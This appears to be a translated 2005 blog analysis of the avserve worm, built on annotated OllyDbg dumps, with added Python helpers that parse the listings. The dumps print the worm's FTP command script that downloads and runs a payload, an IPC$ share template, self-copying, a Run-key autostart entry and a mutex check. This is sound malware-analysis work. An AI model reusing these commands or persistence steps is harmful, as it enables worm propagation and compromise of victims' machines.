Preliminary analysis of the avserve virus
Author: mejy    Source: http://blog.csdn.net/sunwear    Updated: 2005-2-15
3E 63 6D 64 2E 66 74 70 26 65 63 68 6F 20 6F  >>cmd.ftp&echo o
004069B8  6E 26 66 74 70 20 2D 73 3A 63 6D 64 2E 66 74 70  n&ftp -s:cmd.ftp
004069C8  26 25 69 5F 75 70 2E 65 78 65 26 65 63 68 6F 20  &%i_up.exe&echo
004069D8  6F 66 66 26 64 65 6C 20 63 6D 64 2E 66 74 70 26  off&del cmd.ftp&
004069E8  65 63 68 6F 20 6F 6E 0A 00 00 00 00 31 32 37 2E  echo on.....127.
004069F8  30 2E 30 2E 31 00 00 00 25 73 25 63 00 00 00 00  0.0.1...%s%c....
00406A08  5C 5C 25 73 5C 69 70 63 24 00 00 00 EB 06        \\%s\ipc$...??
This is probably the part that does the damage (my guess).
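As an added example (not part of the original article), the following Python joins OllyDbg data-window dump lines like the ones above into a byte buffer and carves the NUL-terminated strings out of it; only the complete lines are used, because the page's first dump line lost its address column.

```python
import re

# Constructed input: the OllyDbg data-window dump quoted on this page. The page's
# first dump line lost its address column, so only the complete lines are used.
DUMP = r"""
004069B8  6E 26 66 74 70 20 2D 73 3A 63 6D 64 2E 66 74 70  n&ftp -s:cmd.ftp
004069C8  26 25 69 5F 75 70 2E 65 78 65 26 65 63 68 6F 20  &%i_up.exe&echo
004069D8  6F 66 66 26 64 65 6C 20 63 6D 64 2E 66 74 70 26  off&del cmd.ftp&
004069E8  65 63 68 6F 20 6F 6E 0A 00 00 00 00 31 32 37 2E  echo on.....127.
004069F8  30 2E 30 2E 31 00 00 00 25 73 25 63 00 00 00 00  0.0.1...%s%c....
00406A08  5C 5C 25 73 5C 69 70 63 24 00 00 00 EB 06        \\%s\ipc$...??
"""
HEX_PAIR = re.compile(r"[0-9A-Fa-f]{2}")

def parse_dump(text):
    """Join dump lines ("ADDR  HH HH ...  ascii") into one contiguous byte
    string, using the address column to detect gaps or misordered lines."""
    buf, expected = bytearray(), None
    for line in text.splitlines():
        parts = line.split(None, 1)
        if len(parts) != 2 or not re.fullmatch(r"[0-9A-Fa-f]{8}", parts[0]):
            continue                              # prose or a truncated line
        addr = int(parts[0], 16)
        if expected is not None and addr != expected:
            raise ValueError(f"dump not contiguous at {addr:08X}")
        row = []
        for tok in parts[1].split(" "):
            if not HEX_PAIR.fullmatch(tok):
                break                             # double space starts the ASCII column
            row.append(int(tok, 16))
        buf += bytes(row)
        expected = addr + len(row)
    return bytes(buf)

def carve_strings(buf, min_len=4):
    """Split on NUL terminators and keep runs of printable ANSI text (plus
    tab/CR/LF): the C strings the worm later fills in through the printf-style
    placeholders visible in the dump (%s, %c, %i)."""
    def printable(b):
        return 0x20 <= b < 0x7F or b in (9, 10, 13)
    return [c.decode("ascii") for c in buf.split(b"\x00")
            if len(c) >= min_len and all(printable(b) for b in c)]
```

The recovered strings are the tail of the FTP command script, the loopback address, and the `\\%s\ipc$` UNC share template; the trailing `EB 06` bytes are code, not text, and are dropped.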
004026C0  /$ 8B4C24 04      MOV ECX,DWORD PTR SS:[ESP+4]
Part omitted here; you can trace it yourselves.
0040271C  |. EB 03          JMP SHORT dumped_.00402721
0040271E  |> 8D79 FC        LEA EDI,DWORD PTR DS:[ECX-4]
00402721  |> 8B4C24 0C      MOV ECX,DWORD PTR SS:[ESP+C]   the name of the virus's other copy, avserve.exe
00402725  |. F7C1 03000000  TEST ECX,3
Part omitted.
0040279F  \. C3             RETN

004020C7  |. 59             POP ECX
004020C8  |. 59             POP ECX
004020C9  |> FF35 C8684000  PUSH DWORD PTR DS:[4068C8]               ;  dumped_.00406920
004020CF  |. 8D85 DCFBFFFF  LEA EAX,DWORD PTR SS:[EBP-424]
004020D5  |. 50             PUSH EAX
004020D6  |. E8 E5050000    CALL dumped_.004026C0
004020DB  |. 807D 08 00     CMP BYTE PTR SS:[EBP+8],0
004020DF  |. 59             POP ECX
004020E0  |. 59             POP ECX
004020E1  |. 74 16          JE SHORT dumped_.004020F9   checks whether avserve.exe already exists in your Windows installation directory; if not, the code below copies it there

004020E3  |. 8D85 DCFBFFFF  LEA EAX,DWORD PTR SS:[EBP-424]
004020E9  |. 6A 00          PUSH 0                                   ; /FailIfExists = FALSE
004020EB  |. 50             PUSH EAX                                 ; |NewFileName
004020EC  |. 8D85 DCF7FFFF  LEA EAX,DWORD PTR SS:[EBP-824]           ; |
004020F2  |. 50             PUSH EAX                                 ; |ExistingFileName
004020F3  |. FF15 48504000  CALL DWORD PTR DS:[<&kernel32.CopyFileA>>; \CopyFileA  copies itself automatically
004020F9  |> 8D45 FC        LEA EAX,DWORD PTR SS:[EBP-4]
004020FC  |. 50             PUSH EAX                                 ; /pHandle
004020FD  |. 68 806A4000    PUSH dumped_.00406A80                    ; |Subkey = "SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
00402102  |. 68 02000080    PUSH 80000002                            ; |hKey = HKEY_LOCAL_MACHINE
00402107  |. FF15 04504000  CALL DWORD PTR DS:[<&advapi32.RegOpenKey>; \RegOpenKeyA   obvious enough: it modifies your registry so the program runs automatically at boot
0040210D  |. 8D85 DCFBFFFF  LEA EAX,DWORD PTR SS:[EBP-424]
00402113  |. 50             PUSH EAX
00402114  |. E8 27000000    CALL dumped_.00402140
00402119  |. 59             POP ECX
0040211A  |. 50             PUSH EAX                                 ; /BufSize
0040211B  |. 8D85 DCFBFFFF  LEA EAX,DWORD PTR SS:[EBP-424]           ; |
00402121  |. 50             PUSH EAX                                 ; |Buffer
00402122  |. 6A 01          PUSH 1                                   ; |ValueType = REG_SZ
00402124  |. 6A 00          PUSH 0                                   ; |Reserved = 0
00402126  |. FF35 C8684000  PUSH DWORD PTR DS:[4068C8]               ; |ValueName = "avserve.exe"
0040212C  |. FF75 FC        PUSH DWORD PTR SS:[EBP-4]                ; |hKey
0040212F  |. FF15 08504000  CALL DWORD PTR DS:[<&advapi32.RegSetValu>; \RegSetValueExA
00402135  |. FF75 FC        PUSH DWORD PTR SS:[EBP-4]                ; /hKey
00402138  |. FF15 0C504000  CALL DWORD PTR DS:[<&advapi32.RegCloseKe>; \RegCloseKey
0040213E  |. C9             LEAVE
0040213F  \. C3             RETN this routine ends here; it returns and goes on to do its damage below
×××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××
00402003  |. 59             POP ECX
00402004  |. 59             POP ECX
00402005  |. E8 1EF0FFFF    CALL dumped_.00401028
0040200A  |. 33F6           XOR ESI,ESI
0040200C  |. 68 746A4000    PUSH dumped_.00406A74                    ; /MutexName = "Jobaka3l"
00402011  |. 56             PUSH ESI                                 ; |InitialOwner => FALSE
00402012  |. 56             PUSH ESI                                 ; |pSecurity => NULL
00402013  |. FF15 40504000  CALL DWORD PTR DS:[<&kernel32.CreateMute>; \CreateMutexA  
Creates a mutex; what is its purpose?
00402019  |. FF15 3C504000  CALL DWORD PTR DS:[<&kernel32.GetLastErr>; [GetLastError
0040201F  |. 3D B7000000    CMP EAX,0B7
00402024  |. 75 07
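An added example, not from the article: a small Python parser for OllyDbg's argument annotations (`/`, `|`, `\`) that rebuilds the API calls from the two listings above (the self-copy and Run-key routine, and the mutex creation) and flags the persistence behaviour the annotator pointed out by hand. The listing excerpt is taken from this page with English-only annotations; the RegCloseKey call and some pushes are omitted for brevity.

```python
# Constructed input: excerpt of the OllyDbg listing quoted on this page (annotations
# kept in English; the CALL to RegCloseKey and some pushes are omitted for brevity).
LISTING = r"""
004020E9  |. 6A 00          PUSH 0                                   ; /FailIfExists = FALSE
004020EB  |. 50             PUSH EAX                                 ; |NewFileName
004020EC  |. 8D85 DCF7FFFF  LEA EAX,DWORD PTR SS:[EBP-824]           ; |
004020F2  |. 50             PUSH EAX                                 ; |ExistingFileName
004020F3  |. FF15 48504000  CALL DWORD PTR DS:[<&kernel32.CopyFileA>>; \CopyFileA
004020FC  |. 50             PUSH EAX                                 ; /pHandle
004020FD  |. 68 806A4000    PUSH dumped_.00406A80                    ; |Subkey = "SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
00402102  |. 68 02000080    PUSH 80000002                            ; |hKey = HKEY_LOCAL_MACHINE
00402107  |. FF15 04504000  CALL DWORD PTR DS:[<&advapi32.RegOpenKey>; \RegOpenKeyA
0040211A  |. 50             PUSH EAX                                 ; /BufSize
00402122  |. 6A 01          PUSH 1                                   ; |ValueType = REG_SZ
00402126  |. FF35 C8684000  PUSH DWORD PTR DS:[4068C8]               ; |ValueName = "avserve.exe"
0040212C  |. FF75 FC        PUSH DWORD PTR SS:[EBP-4]                ; |hKey
0040212F  |. FF15 08504000  CALL DWORD PTR DS:[<&advapi32.RegSetValu>; \RegSetValueExA
0040200C  |. 68 746A4000    PUSH dumped_.00406A74                    ; /MutexName = "Jobaka3l"
00402011  |. 56             PUSH ESI                                 ; |InitialOwner => FALSE
00402012  |. 56             PUSH ESI                                 ; |pSecurity => NULL
00402013  |. FF15 40504000  CALL DWORD PTR DS:[<&kernel32.CreateMute>; \CreateMutexA
"""

def parse_calls(listing):
    """Rebuild (api, {arg: value}) from OllyDbg's '/', '|' (pushes) and '\\' (CALL) notes."""
    calls, pending = [], []
    for line in listing.splitlines():
        note = line.partition(";")[2].strip()
        name, _, value = note[1:].partition("=")
        if note.startswith("\\"):
            calls.append((note[1:].split()[0], dict(pending[::-1])))  # stdcall pushes the last C argument first
            pending = []
        elif note[:1] in ("/", "|") and name.strip():      # a bare '|' filler line has no name
            pending.append((name.strip(), value.lstrip(">").strip() or None))
    return calls

def persistence_findings(calls):
    """Flag the behaviour the annotator noted: self-copy, HKLM Run autostart, named mutex."""
    out, run_key = [], False
    for api, a in calls:
        if api == "CopyFileA":
            out.append(f"self-copy via CopyFileA, FailIfExists={a['FailIfExists']}")
        elif api == "RegOpenKeyA":
            run_key = a.get("hKey") == "HKEY_LOCAL_MACHINE" and "CurrentVersion\\Run" in (a.get("Subkey") or "")
        elif api == "RegSetValueExA" and run_key:
            out.append(f"autostart value {a['ValueName']} written under the HKLM Run key")
        elif api == "CreateMutexA":
            out.append(f"named mutex {a['MutexName']} created as a single-instance marker")
    return out
```

The `CMP EAX,0B7` that follows `CreateMutexA` in the listing compares the `GetLastError` result with ERROR_ALREADY_EXISTS (0xB7), which is how the code learns that another instance already owns the "Jobaka3l" mutex.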
